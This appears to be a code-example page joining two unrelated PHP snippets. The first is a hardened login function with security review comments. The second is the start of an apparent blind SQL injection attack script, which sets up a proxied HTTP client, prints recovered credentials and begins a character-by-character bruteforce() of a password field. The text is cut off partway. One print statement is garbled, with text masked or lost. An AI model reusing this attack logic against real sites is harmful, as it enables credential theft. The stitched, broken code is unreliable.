Beispiel #1
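/**
 * Check an e-mail / password pair against the `login` table.
 *
 * Flow: look the account up by e-mail, ask bruteforce() whether the account
 * is currently locked, then compare the salted hash of the submitted password
 * with the stored one. A failed comparison is recorded in `attempts`.
 *
 * Security notes for maintainers:
 *  - The stored value is a single salted SHA-1 round. SHA-1 is a fast hash and
 *    is not suitable for password storage; it is kept here only because the
 *    existing rows are in that format. Migrating to password_hash() /
 *    password_verify() (re-hashing on the next successful login) is the fix.
 *  - The comparison uses hash_equals(): the previous loose `==` treats two
 *    numeric-looking digests (for example both starting with "0e" followed by
 *    digits) as equal and is not constant-time.
 *
 * @param string $email    E-mail address submitted by the user.
 * @param string $password Plain-text password submitted by the user.
 * @param object $db       Connection exposing prepare() as used below
 *                         (presumably mysqli - confirm against the caller).
 *
 * @return bool true when the credentials match and ins_token() has been called;
 *              false for an unknown e-mail, a locked account, a wrong password
 *              or a failed prepare().
 */
function login_pro($email, $password, $db)
{
    // NOTE(review): the column is spelled `usename`; left as-is because the
    // schema is not visible here - verify it is not a typo for `username`.
    $query = $db->prepare("Select id,usename,password,salt from login where email=?");
    if (!$query) {
        // Fail closed: previously a failed prepare() fell off the end of the
        // function and returned null.
        return false;
    }

    $query->bind_param('s', $email);
    $query->execute();
    $query->store_result();
    $query->bind_result($user_id, $username, $p_word, $salt);
    $query->fetch();

    if ((int) $query->num_rows !== 1) {
        // No user exists.
        return false;
    }

    if (bruteforce($user_id, $db) == true) {
        // Account is locked. header() only queues the redirect, so return
        // explicitly; the caller must stop producing output after a false.
        header('Location: acclocked.php');
        return false;
    }

    // Hash only once the account is known to exist and is not locked.
    $candidate = hash('sha1', $password . $salt);

    // is_string() guards hash_equals() against a NULL password column.
    if (is_string($p_word) && hash_equals($p_word, $candidate)) {
        ins_token($db, $email);
        return true;
    }

    // Password is not correct: record the attempt with bound parameters,
    // in line with the SELECT above, rather than interpolating values into SQL.
    $now = time();
    $insert = $db->prepare("INSERT INTO attempts(user_id, time) VALUES (?, ?)");
    if ($insert) {
        $insert->bind_param('si', $user_id, $now);
        $insert->execute();
    }

    return false;
}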
Beispiel #2
// Script driver: configures the HTTP client object $xpl (created outside this
// excerpt), prints a prompt and runs bruteforce() once for the 'pwd' field.
//
// The User-Agent is the fixed literal 'Mozilla Firefox', which is not the
// format a real browser sends; that exact string in web-server access logs is
// a usable detection signal for traffic produced by this script.
$xpl->agent('Mozilla Firefox');
// Both calls pass 0 - presumably "do not follow redirects" and "no cookie
// jar"; the client class is not shown here, confirm against its definition.
$xpl->allowredirection(0);
$xpl->cookiejar(0);
// Optional proxy and proxy credentials, applied only when the variables are set.
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($proxyauth) {
    $xpl->proxyauth($proxyauth);
}
// debug() is defined outside this excerpt; called with 1 when $debug is truthy.
if ($debug) {
    debug(1);
}
// NOTE(review): the next statement is not valid PHP as shown - the text
// between the two string literals appears to have been masked or lost when
// the page was extracted. Left untouched.
print "\nUsername: "******"\nPassword: ";
// Run the bruteforce() routine defined below for the field name 'pwd',
// then end the script with exit status 0.
bruteforce('pwd');
exit(0);
function bruteforce($field)
{
    global $url, $xpl, $tblprfix, $truetime, $debug, $benchmark, $sql, $bef, $aft, $fak, $b, $c, $f, $dfield, $a, $result;
    $a = 0;
    $v = '';
    $dfield = $field;
    if (eregi('a', $field)) {
        $b = '-1';
        $c = '127';
    } else {
        $b = '46';
        $c = '70';
    }
    # pwd charset